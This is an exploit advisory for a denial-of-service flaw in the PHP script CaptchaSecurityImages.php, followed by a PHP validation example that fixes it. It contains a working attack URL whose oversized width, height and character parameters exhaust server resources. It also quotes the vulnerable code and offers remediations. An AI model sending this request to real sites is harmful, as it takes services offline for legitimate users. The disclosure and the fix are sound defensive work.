# Exploit Title: CaptchaSecurityImages.php Denial Of Service
# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | www.DigitalWhisper.co.il
# Software Link: http://www.white-hat-web-design.co.uk/articles/php-captcha.php
#
#
#[Denial Of Service]
(OWASP: The Denial of Service (DoS) attack is focused on making unavailable a resource (site, application, server) for the purpose it was designed. There are many ways to make a service unavailable for legitimate users by manipulating network packets, programming, logical, or resources handling vulnerabilities, among others. If a service receives a very large number of requests, it may stop providing service to legitimate users. In the same way, a service may stop if a programming vulnerability is exploited, or the way the service handles resources used by it.)
#
#Exploit:
/CaptchaSecurityImages.php?width=13333337&height=13333337&characters=13333337
#
#
The vulnerable code is (lines 73-75):
#
$width = isset($_GET['width']) ? $_GET['width']:'120';
$height = isset($_GET['height']) ? $_GET['height']:'40';
$characters = isset($_GET['characters']) && $_GET['characters']>1 ? $_GET['characters']:'6';
#
To fix it, delete all the "$_GET[x]" strings and make the values constant, like this:
#
$width=100;
$height=40;
$characters=5;
#
#
#[e0f]
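If the dimensions have to stay configurable per request, an alternative to hard-coding them is to accept each value only inside a fixed range. The following is an added example, not code from the original script or from this advisory; the helper names and the range limits are assumptions, and the defaults (120, 40, 6) are the ones used in the vulnerable lines above.

```php
<?php
// Added example (not part of CaptchaSecurityImages.php): bounded parsing of
// the three request parameters. Helper names and limits are assumptions.

/**
 * Return $params[$name] as an int within [$min, $max], or $default when the
 * value is missing, an array, not an integer, or out of range.
 */
function bounded_int(array $params, string $name, int $default, int $min, int $max): int
{
    if (!isset($params[$name]) || !is_scalar($params[$name])) {
        return $default;
    }
    $value = filter_var(
        $params[$name],
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]
    );
    return $value === false ? $default : $value;
}

/** Resolve all three CAPTCHA parameters; in the script this would receive $_GET. */
function captcha_dimensions(array $params): array
{
    return [
        'width'      => bounded_int($params, 'width', 120, 60, 300),
        'height'     => bounded_int($params, 'height', 40, 20, 100),
        'characters' => bounded_int($params, 'characters', 6, 2, 8),
    ];
}

// Constructed sample inputs: the oversized request from the advisory,
// an ordinary request, and malformed values.
$samples = [
    ['width' => '13333337', 'height' => '13333337', 'characters' => '13333337'],
    ['width' => '150', 'height' => '50', 'characters' => '5'],
    ['width' => ['x'], 'height' => '-1', 'characters' => 'abc'],
];
foreach ($samples as $sample) {
    // Out-of-range and malformed values fall back to the defaults.
    echo json_encode(captcha_dimensions($sample)), PHP_EOL;
}
```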